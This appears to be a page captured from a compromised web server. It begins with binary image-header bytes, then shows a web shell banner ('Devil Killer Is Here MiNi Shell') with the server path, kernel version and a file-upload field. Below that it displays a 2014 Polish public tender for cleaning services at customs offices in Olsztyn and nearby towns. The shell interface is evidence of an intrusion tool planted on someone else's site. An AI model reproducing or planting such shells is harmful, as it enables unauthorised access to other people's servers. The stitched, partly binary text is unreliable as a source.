JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140923/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140923/202121-N-2014.html

<p class="kh_header"><b>Olsztyn: Świadczenie usług utrzymywania czystości w jednostkach organizacyjnych Izby Celnej w Olsztynie</b><br>
<b>Numer ogłoszenia: 202121 - 2014; data zamieszczenia: 23.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Izba Celna w Olsztynie , ul. Dworcowa 1, 10-413 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5397015, faks 089 5397016.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.olsztyn.ic.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług utrzymywania czystości w jednostkach organizacyjnych Izby Celnej w Olsztynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług utrzymania czystości w obiektach i na terenach zewnętrznych jednostek organizacyjnych Izby Celnej w Olsztynie tj.: 
CZĘŚĆ 1 - pomieszczenia i plac Urzędu i Oddziału Celnego w Olsztynie. Przedmiotem zamówienia jest świadczenie usług:
1)utrzymania czystości wewnątrz budynków Urzędu/Oddziału Celnego w Olsztynie, zlokalizowanych w Olsztynie przy ul. Składowej 5 oraz pomieszczeń biurowych wynajmowanych na potrzeby komórek organizacyjnych Izby Celnej w Olsztynie, zlokalizowanych przy ul. Składowej 5
2)utrzymania czystości na posesji, placu odpraw, parkingu i pasie zieleni, usytuowanych w sąsiedztwie budynków, o których mowa w pkt 1);
3)odśnieżania w okresie zimowym wraz z posypywaniem piachem, solą/mieszanką posesji, placu odpraw, parkingu, usytuowanych w sąsiedztwie budynków, o których mowa w pkt 1).
Charakterystyka budynku:
Wielkość powierzchni wewnętrznej biurowej wynosi odpowiednio:
-1631 m2 (budynek Urzędu/Oddziału Celnego przy ul. Składowej 5) - dwupiętrowy budynek biurowy z dużą powierzchnią przeszklenia (122 okna + witryna), z pomieszczeniami biurowymi, zapleczem socjalnym i higieniczno - sanitarnym oraz dużą powierzchnią archiwalną; umycie szyb (jednorazowo - powierzchnia przeszklenia 164 m2)
-85,60 m2 - pomieszczenia biurowe wynajmowane od Centrum Motoryzacyjnego (pok. nr 4 i 5 na parterze budynku zlokalizowanego przy ul. Składowej 5 - bez toalet i ciągów komunikacyjnych) - umycie szyb (jednorazowo - powierzchnia przeszklenia 14 m2 ). 
POWIERZCHNIA WEWNĘTRZNA POZOSTAŁA: 
Na terenie należącym do Urzędu Celnego znajduje się również budynek kontroli szczegółowej oraz budynek magazynowy, w których należy wykonywać dodatkowe prace okresowe:
- dwa razy w tygodniu sprzątanie zaplecza sanitarnego, w tym:
-pow. podłóg - 45  m2,
-ilość umywalek  - 6 szt.
-ilość sedesów - 4 szt.
-ilość pisuarów - 4 szt.
-ilość kabin prysznicowych - 1 szt.  
- raz w roku (w kwietniu) umycie szyb, z powierzchnią przeszklenia 161 m2, 
- raz na kwartał sprzątanie (zamiatanie) powierzchni wewnętrznej 852 m2 . 
Koszty sprzątania powierzchni wewnętrznej pozostałej powinny być wliczone w cenę sprzątania  pomieszczeń biurowych Urzędu i Oddziału Celnego w Olsztynie oraz pomieszczeń wynajmowanych. 
Powierzchnia zewnętrzna posesji wynosi 13507 m2- na posesji znajdują się: budynek biurowy Urzędu i Oddziału Celnego, budynek kontroli szczegółowej oraz budynek garażowy (8 boksów), magazynowy, zadaszony śmietnik, przenośna kabina sanitarna, parkingi samochodów ciężarowych i osobowych, chodniki, droga dojazdowa oraz teren zielony około 925 m2. 
CZĘŚĆ 2 - pomieszczenia i plac Urzędu i Oddziału Celnego w Elblągu 
Przedmiotem zamówienia jest świadczenie usług:
1)utrzymania czystości wewnątrz budynków Urzędu/Oddziału Celnego w Elblągu, zlokalizowanych w Elblągu przy ul. Warszawskiej 129A;
2)utrzymania czystości na posesji, placu odpraw, parkingu i pasie zieleni, usytuowanych w sąsiedztwie budynku, o którym mowa w pkt 1);
3)odśnieżania w okresie zimowym wraz z posypywaniem piachem, solą/mieszanką posesji, placu odpraw, parkingu, usytuowanych w sąsiedztwie budynku, o którym mowa w pkt 1).
Charakterystyka budynków:
Dwa budynki biurowe o łącznej powierzchni użytkowej 1110,44 m2, z czego jeden budynek dwukondygnacyjny z pomieszczeniami biurowymi i zapleczem socjalnym i higieniczno - sanitarnym oraz archiwum, dużą powierzchnią przeszkloną (ogółem 84 okna i 5 par drzwi wewn.), drugi budynek parterowy z pomieszczeniami biurowymi , zapleczem i archiwum, dużą powierzchnią przeszkloną ( ogółem 20 okien i 4 pary drzwi). 
Powierzchnia przeszkleń/okien do mycia - podawana jednostronnie: ok. 93 m2 
Powierzchnia drzwi do mycia - podawana jednostronnie: ok. 118 m2 
Podłogi: terakota/beton - ok. 437 m2, pcv - ok. 656 m2.
Wykładzina dywanowa: ok. 100 m2
Ilość umywalek - 17 szt.
Ilość sedesów -  16 szt.
Ilość pisuarów -  6 szt.
Ilość kabin prysznicowych - 3 szt.
Ilość zlewów met. / zlewozmywaków - 2 szt.
Ilość osób pracujących w budynku : ok. 110

Na terenie należącym do Urzędu Celnego znajduje się również budynek kontroli szczegółowej, w którym należy wykonywać dodatkowe prace okresowe:
- raz w roku umycie szyb, z powierzchnią przeszklenia 28,8 m2, 
- raz na kwartał sprzątanie / czyszczenie powierzchni wewnętrznej 894,5 m2 . 
Koszty sprzątania raz na kwartał budynku kontroli szczegółowej oraz mycia okien raz w roku powinny być wliczone w cenę sprzątania pomieszczeń i placu Urzędu i Oddziału Celnego w Elblągu. 
POWIERZCHNIA ZEWNĘTRZNA
Wielkość powierzchni zewnętrznej wynosi 13934,41 m2 - chodniki, utwardzony plac odpraw wraz 
z drogami komunikacyjnymi i rampą oraz tereny zielone około 7800 m2.
CZĘŚĆ 3 - pomieszczenia i plac Oddziału Celnego w Iławie
Przedmiotem zamówienia świadczenie usług:
1)utrzymania czystości wewnątrz budynku Oddziału Celnego w Iławie, zlokalizowanego w Iławie przy ul. Lubawskiej 12;
2)utrzymania czystości na posesji, placu odpraw, parkingu i pasie zieleni zlokalizowanych 
w sąsiedztwie budynku o którym mowa w pkt 1);
3)odśnieżania w okresie zimowym wraz z posypywaniem piachem, solą/mieszanką posesji, placu odpraw, parkingu, usytuowanych w sąsiedztwie budynku, o którym mowa w pkt 1);
Wielkość powierzchni wewnętrznej wynosi 1035 m2. Jest to budynek biurowy IV kondygnacyjny, podpiwniczony, o zwartej bryle, ocieplony z dachem płaskim. Wysokość pomieszczeń standardowa. W  piwnicy o pow. ok 254 m2 znajdują się: pom. techniczne, archiwum (składnica akt - 82,16 m2), magazyn na narzędzia, pom. do pobierania próbek oraz  magazyn depozytowy o pow. ok. 90 m2 , w tym cały korytarz - 43 m2. W piwnicy znajduje się również toaleta, którą należy sprzątać co drugi dzień - 6,4 m2. Na II piętrze znajduje się sala narad o powierzchni 50,56 m2. W pozostałej części budynku znajdują się pomieszczenia biurowe z zapleczem higieniczno - sanitarnym/socjalnym. 
Charakterystyka:
Powierzchnia przeszkleń/okien do mycia - podawana jednostronnie: ok. 184 m2
Powierzchnia drzwi do mycia - podawana jednostronnie: ok. 124 m2
Podłogi: terakota/beton - ok. 664 m2, pcv - ok. 175 m2.
Wykładzina dywanowa/dywany: ok. 197 m2
Ilość umywalek - 13 szt.
Ilość sedesów -  13 szt.
Ilość pisuarów -  3 szt.
Ilość kabin prysznicowych: 4 szt.
Ilość zlewów met. / zlewozmywaków - 2 szt.
Ilość osób pracujących w budynku : ok. 40
Na terenie należącym do Oddziału Celnego znajduje się również budynek kontroli szczegółowej, 
w którym należy wykonywać dodatkowe prace okresowe:
- raz w roku umycie szyb, z powierzchnią przeszklenia 10,6 m2, 
- raz na kwartał sprzątanie / czyszczenie powierzchni wewnętrznej 332,6 m2 . 
Koszty sprzątania raz na kwartał budynku kontroli szczegółowej oraz mycia okien raz w roku powinny być wliczone w cenę sprzątania pomieszczeń i posesji Oddziału Celnego w Iławie. 
Powierzchnia zewnętrzna posesji wynosi 7064 m2 - składają się na nią chodniki, utwardzony plac odpraw wraz z drogami komunikacyjnymi oraz tereny zielone około 1944 m2.
CZĘŚĆ 4 - pomieszczenia i plac Oddziału Celnego w Ełku
Przedmiotem zamówienia jest świadczenie usług:
1)utrzymania czystości wewnątrz budynków Oddziału Celnego w Ełku zlokalizowanego przy 
ul. Przemysłowej 10 w Ełku;
2)utrzymania czystości na posesji, placu odpraw, parkingu i pasie zieleni, usytuowanych w sąsiedztwie budynku, o którym mowa w pkt 1);
3)odśnieżania w okresie zimowym wraz z posypywaniem piachem, solą/mieszanką chodników, placu odpraw i parkingu, usytuowanych w sąsiedztwie budynku, o którym mowa w pkt 1).
Charakterystyka budynku:
Wielkość powierzchni wewnętrznej wynosi 784 m2. Budynek jest podpiwniczony, z wysokim parterem i piętrem. Pomieszczenia piwniczne częściowo wykorzystywane są na zaplecze gospodarcze i archiwum - ich sprzątanie odbywać się będzie okresowo. W pozostałej części budynku znajdują się pomieszczenia biurowe z zapleczem higieniczno - sanitarnym/socjalnym. 
Charakterystyka:
Powierzchnia przeszkleń do mycia - podawana jednostronnie: 145,2 m2 (w tym 133 okna)
Powierzchnia drzwi do mycia - podawana jednostronnie: ok. 96 m2 (57 drzwi)
Podłogi: 100 % terakota
Ilość umywalek - 8 szt.
Ilość sedesów -  6 szt.
Ilość pisuarów -  2 szt.
Ilość zlewów met / zlewozmywaków - 1 szt.
Ilość osób pracujących w budynku : ok. 30
POWIERZCHNIA ZEWNĘTRZNA
Wielkość powierzchni zewnętrznej wynosi 3430 m2 (w tym ok. 90% to teren utwardzony), na którą składa się plac odpraw, tereny zielone około 578 m2 , parking samochodów osobowych..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp, w wysokości do 20 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.12.00-8, 90.91.13.00-9, 90.62.00.00-0, 39.80.00.00-0, 33.76.00.00-5, 33.71.19.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań dotyczących tego warunku a ocena jego spełniania zostanie dokonana na podstawie złożonego oświadczenia /zgodnie z pkt. 6.3 SIWZ/</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie wykonawca winien wykazać się należytym wykonaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 usług tożsamych (tzn. usług obejmujących utrzymanie czystości o podobnym charakterze), z czego co najmniej jedna usługa winna mieć wartość co najmniej: 
a)	40 000,00 zł w części 1 zamówienia;
b)	40 000,00 zł w części 2 zamówienia;
c)	20 000,00 zł w części 3 zamówienia;
d)	15 000,00 zł w części 4 zamówienia.
Ocena spełniania tego warunku zostanie dokonana na podstawie wykazu wykonanych głównych usług oraz dowodów czy zostały wykonane lub są wykonywane należycie /zgodnie z punktem 6.4 SIWZ/.
W przypadku  składania oferty na więcej niż jedną część zamówienia, kwota ta musi być sumą kwot wskazanych dla poszczególnych części</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań dotyczących tego warunku a ocena jego spełniania zostanie dokonana na podstawie złożonego oświadczenia /zgodnie z pkt. 6.3 SIWZ/</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań dotyczących tego warunku a ocena jego spełniania zostanie dokonana na podstawie złożonego oświadczenia /zgodnie z pkt. 6.3 SIWZ/</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie wykonawca winien wykazać się posiadaniem aktualnego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
Ocena spełniania tego warunku zostanie dokonana na podstawie dokumentu opisanego w pkt 6.5 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. wypełniony i podpisany formularz ofertowy - załącznik nr 1 do SIWZ 2. w przypadku, gdy umocowanie do reprezentowania wykonawcy nie wynika ze stosownego dokumentu, a w szczególności z odpisu z właściwego rejestru, należy załączyć pełnomocnictwo do występowania w imieniu wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza istotne zmiany postanowień umowy w przypadku:
1)okresowego lub stałego wyłączenia części pomieszczeń z zakresu umowy, np. w związku z remontem, awarią, rozwiązaniem umowy najmu pomieszczeń lub zdarzeniami losowymi, których nie można było przewidzieć w dniu zawarcia umowy; w takim przypadku wynagrodzenie wykonawcy ulegnie zmniejszeniu o czas i obszar niewykonywania usługi, zgodnie ze stawką wskazaną w §7 ust. 1 umowy.
2)zmian wynikających z wejścia w życie z dniem 1 lipca 2013r. ustawy z dnia 1 lipca 2011 r. o zmianie ustawy o utrzymaniu czystości i porządku w gminach oraz niektórych innych ustaw (Dz. U. z 2011r. nr 152, poz. 897), które to zmiany będą związane z odbiorem odpadów przez Gminę .. (w zależności od części zamówienia) i wprowadzeniem nowego systemu gospodarki odpadami komunalnymi; w takim przypadku możliwe będzie ustalenie nowych zasad opróżniania koszy na śmieci i wynoszenia ich do miejsca składowania odpadów (selektywne zbieranie odpadów). Powyższa zmiana nie spowoduje zwiększenia wynagrodzenia wykonawcy; 
3)zmian danych osobowych, adresowych i organizacyjnych stron umowy.
4)wystąpienia (ujawnienia) w trakcie realizacji umowy okoliczności uzasadniających dokonanie uściśleń/uzupełnień/zmian postanowień umownych korzystnych dla zamawiającego, niemożliwych wcześniej do przewidzenia. W powyższej sytuacji wynagrodzenie wykonawcy nie zostanie zwiększone. 
2.Wszelkie zmiany postanowień umowy muszą być wprowadzane na piśmie pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.olsztyn.ic.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Izba Celna w Olsztynie, ul. Dworcowa 1, 10-413 Olsztyn ic.olsztyn.ilgw@ols.mofnet.gov.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.10.2014 godzina 10:00, miejsce: Izba Celna w Olsztynie, ul. Dworcowa 1, 10-413 Olsztyn Kancelaria Ogólna (parter, pok. 21a).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> pomieszczenia i plac Urzędu i Oddziału Celnego w Olsztynie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług:
1)utrzymania czystości wewnątrz budynków Urzędu/Oddziału Celnego w Olsztynie, zlokalizowanych w Olsztynie przy ul. Składowej 5 oraz pomieszczeń biurowych wynajmowanych na potrzeby komórek organizacyjnych Izby Celnej w Olsztynie, zlokalizowanych przy ul. Składowej 5
2)utrzymania czystości na posesji, placu odpraw, parkingu i pasie zieleni, usytuowanych w sąsiedztwie budynków, o których mowa w pkt 1);
3)odśnieżania w okresie zimowym wraz z posypywaniem piachem, solą/mieszanką posesji, placu odpraw, parkingu, usytuowanych w sąsiedztwie budynków, o których mowa w pkt 1).
Charakterystyka budynku:
Wielkość powierzchni wewnętrznej biurowej wynosi odpowiednio:
